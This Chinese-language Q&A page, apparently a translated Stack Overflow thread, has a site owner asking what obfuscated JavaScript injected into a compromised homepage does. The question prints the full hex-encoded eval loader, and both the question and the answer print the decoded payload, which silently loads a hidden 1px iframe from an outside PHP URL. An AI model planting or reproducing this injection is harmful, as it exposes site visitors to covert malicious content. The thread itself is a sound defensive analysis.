注入了恶意javascript - 它做了什么?

时间:2013-04-01 20:00:32

标签: javascript

我们的一个网站最近将他们的ftp帐户泄露,因此攻击者将以下javascript注入其主页html。我对javascript很不错,但我不能对这段代码实际做的事情做出正面或反面。这里的其他任何人都会看到这是怎么回事?

p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!66!71!7@!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!66!71!7@!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!6@!6e!65!6c!6f!76!65!72!67!75!6@!64!65!2e!63!6f!6d!2f!5f!76!74!6@!5f!62!6@!6e!2f!63!6f!75!6e!74!65!72!2e!70!68!70!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!66!71!7@!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!66!71!7@!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!66!71!7@!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!66!71!7@!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!66!71!7@!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=12;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-484!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}

将e(s)更改为console.log后,我得到以下内容:

(function () {
    var fqy = document.createElement('iframe');

    fqy.src = 'http://wineloverguide.com/_vti_bin/counter.php';
    fqy.style.position = 'absolute';
    fqy.style.border = '0';
    fqy.style.height = '1px';
    fqy.style.width = '1px';
    fqy.style.left = '1px';
    fqy.style.top = '1px';

    if (!document.getElementById('fqy')) {
        document.write('<div id=\'fqy\'></div>');
        document.getElementById('fqy').appendChild(fqy);
    } })();

1 个答案:

答案 0 :(得分:2)

如果仔细观察代码,它只会有一个十六进制数字字符串,它会逐个字符地转换为JavaScript代码。

在该代码中的某一点,我看到e=eval,然后最后是e(s)。因此,如果您将e(s)更改为console.log(s),则可以看到此代码真正正在做什么。

(function () {
    var fqy = document.createElement('iframe');

    fqy.src = 'http://wineloverguide.com/_vti_bin/counter.php';
    fqy.style.position = 'absolute';
    fqy.style.border = '0';
    fqy.style.height = '1px';
    fqy.style.width = '1px';
    fqy.style.left = '1px';
    fqy.style.top = '1px';

    if (!document.getElementById('fqy')) {
        document.write('<div id=\'fqy\'></div>');
        document.getElementById('fqy').appendChild(fqy);
    }
})();